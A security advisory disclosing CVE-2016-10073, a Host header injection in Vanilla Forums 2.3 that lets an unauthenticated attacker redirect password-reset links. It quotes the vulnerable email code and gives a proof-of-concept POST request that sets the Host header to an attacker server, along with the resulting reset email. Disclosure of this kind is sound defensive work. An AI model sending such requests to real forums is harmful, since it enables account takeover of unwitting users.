=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com

- CVE-2016-10073
- Release date: 11.05.2017
- Revision 1.0
- Severity: Medium
=============================================


I. VULNERABILITY
-------------------------

Vanilla Forums <= 2.3 Host Header Injection CVE-2016-10073 [0day]


II. BACKGROUND
-------------------------

"Community Forums Reinvented
Create an online community that your customers will love. Vanilla's forum 
software is used by top brands to engage customers, drive loyalty and reduce
support costs."

"Vanilla provides cloud and open source community forum software that powers 
discussion forums worldwide with close to 1M downloads. 
Built for flexibility and integration, Vanilla is the best, most powerful 
community solution in the world."

https://vanillaforums.com/en/software/
https://open.vanillaforums.com/


III. INTRODUCTION
-------------------------

Vanilla Forums software (including the latest stable version of 2.3 in
its default configuration) is affected by:

* Host Header Injection CVE-2016-10073 (0day)

which can be exploited by unauthenticated remote attackers to potentially
intercept password reset hash and gain unauthorized access to the victim
account or perform web-cache poisoning attacks.


IV. DESCRIPTION 
-------------------------


Vanilla Forums software, in its default configuration, makes use of 
user-supplied HTTP HOST header (CVE-2016-10073) when sending emails
from the host on which the forum was installed. 

The HOST header is used to form the sender email address as we can see
in the following snippet of code:

------[ library/core/class.email.php ]------

...

public function from($SenderEmail = '', $SenderName = '', $bOverrideSender = false) {
        if ($SenderEmail == '') {
            $SenderEmail = c('Garden.Email.SupportAddress', '');
            if (!$SenderEmail) {
                $SenderEmail = 'noreply@'.Gdn::request()->host();
            }
        }

        if ($SenderName == '') {
            $SenderName = c('Garden.Email.SupportName', c('Garden.Title', ''));
        }

        if ($this->PhpMailer->Sender == '' || $bOverrideSender) {
            $this->PhpMailer->Sender = $SenderEmail;
        }

        ob_start();
        $this->PhpMailer->setFrom($SenderEmail, $SenderName, false);
        ob_end_clean();
        return $this;
}


...

-----------------------------------------


As we can see by default, Vanilla will use the 'noreply@HOST' address where
HOST is obtained from the client HTTP request.



V. PROOF OF CONCEPT
-------------------------

An attacker may use HTTP HOST header to set the email domain to an arbitrary
host. For example. Sending the following HTTP request:

------------

POST /vanilla2-3/entry/passwordrequest HTTP/1.1
Host: attackers_server
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Content-Length: 149

hpt=&Target=discussions&ClientHour=2017-05-10+22%3A00&Email=victim&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON

------------

will result in the following email sent to the victim:

------------

To: victim@victim-server.com
Subject: [Vanilla 2.3] Reset Your Password
X-PHP-Originating-Script: 0:class.phpmailer.php
Date: Thu, 11 May 2017 09:42:13 +0000
Return-Path: noreply@attackers_server
Message-ID: <a989e3868a609316dd9a7d7a991d79e5@attackers_server>
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="utf-8"

Vanilla 2.3 http://attackers_server/vanilla2-3/=0A=0A=0A=0AReset Your Passw=
ord=0A=0A=0A=0AWe've received a request to change your password at Vanilla =
2.3. If you didn't make this request, please ignore this email.=0A=0A=0A=0A=
Change My Password: http://attackers_server/vanilla2-3/entry/passwordreset/=
2/PdNvqaPnnFaG

------------


Because of the HOST header set to:
Host: attackers_server

The resulting email will have the sender's address set to noreply@attackers_server.
The password reset link will also contain the attacker's server which could
allow the attacker to intercept the hash if the victim user clicked on the 
malicious link. 



VI. BUSINESS IMPACT
-------------------------

With victim user interaction, attacker could potentially intercept the password 
reset hash.

This vulnerability may also lead to web-cache poisoning if the HOST header
is used to form links in web responses. See references for more details
on this vector.

 
VII. SYSTEMS AFFECTED
-------------------------

The latest stable release of Vanilla Forums available at the official website:

https://open.vanillaforums.com/addon/vanilla-core-2.3

was confirmed to be vulnerable. 
Previous versions are also likely to be vulnerable.

This vulnerability can also be combined with CVE-2016-10033 vulnerability 
to achieve Unauthenticated Remote Code Execution as described in a separate
advisory.

 
VIII. SOLUTION
-------------------------

This vulnerability was reported to Vanilla Forums support team in December
2016. Despite the acknowledgment of the issue by the team, it has remained 
unpatched for over 5 months. 
As there has been no progress or further updates, this advisory is finally 
released to the public without an official patch.

 
IX. REFERENCES
-------------------------

https://legalhackers.com

https://ExploitBox.io

https://twitter.com/Exploit_Box

Vendor site:
https://vanillaforums.com

Confirmed vulnerable stable version of Vanilla Forums 2.3:
https://open.vanillaforums.com/addon/vanilla-core-2.3
https://open.vanillaforums.com/discussion/32822/vanilla-2-3-is-now-available

Vanilla Forums RCE 0day exploit:
https://exploitbox.io/vuln/Vanilla-Forums-Exploit-RCE-0day-Remote-Code-Exec-CVE-2016-10033.html

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

Web-cache poisoning:
http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html



X. CREDITS
-------------------------

Discovered by

Dawid Golunski
dawid (at) legalhackers (dot) com

https://legalhackers.com
https://ExploitBox.io
 

XI. REVISION HISTORY
-------------------------

11.05.2017 - Advisory released, rev. 1
 
XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.